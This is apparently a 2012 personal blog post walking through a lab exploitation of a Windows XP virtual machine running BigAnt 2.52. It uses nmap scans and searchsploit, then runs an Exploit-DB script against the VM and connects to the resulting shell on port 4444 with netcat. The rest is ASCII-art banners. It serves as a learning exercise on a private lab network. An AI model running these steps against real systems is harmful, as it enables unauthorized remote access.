Information Security 軍陣: Exploit Windows XP utilize exploitdb [ Bigant% ]

Monday, September 10, 2012

Exploit Windows XP utilize exploitdb [ Bigant% ]

This trial " exploit windows xp" in virtualbox with backtrack. I use exploitdb to know vulnerability database ever exploited. To open search list exploitdb with command :

./searchsploit <name of aplication> <OS> <remote/local>

Now, time to try "How to exploit windows xp" with steps from:

1. Information Gathering

==> Scan live host with nmap >> # nmap <network id/netmask>
# nmap 192.168.56.0/24

2. Service Enumeration

To know service which running on system, we can search with port opened. I use nmap to know open ports. # nmap -p <range port> <ip address>

                       # nmap -p 1-65535 192.168.56.101

       Port 6660/tcp and 6661/tcp is open but i don't know what aplication running on system. Assumptions i know he use bigant aplication version 2.52

3. Vulnerability Assesment
     Search any posibility of bigant vulnerability with searchsploit in exploitdb.
               ===>> # ./searchsploit bigant windows remote

4. Exploit

To see how to use command, open file 10765.py (with cat command or other) and execute this.

==> # python 10765.py 192.168.56.101
==> # nc -vn 192.168.56.101 4444

==========================================================================
==========================================================================

==========================================================================
==========================================================================

IIIIIIIIII SSSSSSSSSSSSSSS 222222222222222 CCCCCCCCCCCCC
I::::::::I SS:::::::::::::::S2:::::::::::::::22 CCC::::::::::::C
I::::::::IS:::::SSSSSS::::::S2::::::222222:::::2 CC:::::::::::::::C
II::::::IIS:::::S SSSSSSS2222222 2:::::2 C:::::CCCCCCCC::::C
I::::I S:::::S 2:::::2 C:::::C CCCCCC
I::::I S:::::S 2:::::2C:::::C
I::::I S::::SSSS 2222::::2 C:::::C
I::::I SS::::::SSSSS 22222::::::22 C:::::C
I::::I SSS::::::::SS 22::::::::222 C:::::C
I::::I SSSSSS::::S 2:::::22222 C:::::C
I::::I S:::::S2:::::2 C:::::C
I::::I S:::::S2:::::2 C:::::C CCCCCC
II::::::IISSSSSSS S:::::S2:::::2 222222 C:::::CCCCCCCC::::C
I::::::::IS::::::SSSSSS:::::S2::::::2222222:::::2 CC:::::::::::::::C
I::::::::IS:::::::::::::::SS 2::::::::::::::::::2 CCC::::::::::::C
IIIIIIIIII SSSSSSSSSSSSSSS 22222222222222222222 CCCCCCCCCCCCC

==========================================================================
==========================================================================

==========================================================================
( ) ) ( ( (
* ) )\ ) ( /( ( /( ( )\ ) )\ ) )\ )
` ) /((()/( )\()) )\()) )\ (()/((()/( ( (()/(
( )(_))/(_))((_)\ ((_)\((((_)( /(_))/(_)) )\ /(_))
(_(_())(_)) __ ((_) _((_))\ _ )\ (_)) (_))_ ((_) (_))
|_ _|| _ \\ \ / / | || |(_)_\(_)| _ \ | \ | __|| _ \
| | | / \ V / | __ | / _ \ | / | |) || _| | /
|_| |_|_\ |_| |_||_|/_/ \_\ |_|_\ |___/ |___||_|_\

==========================================================================

Information Security 軍陣

ROOT

=======================================================

Monday, September 10, 2012

Exploit Windows XP utilize exploitdb [ Bigant% ]

My Classmate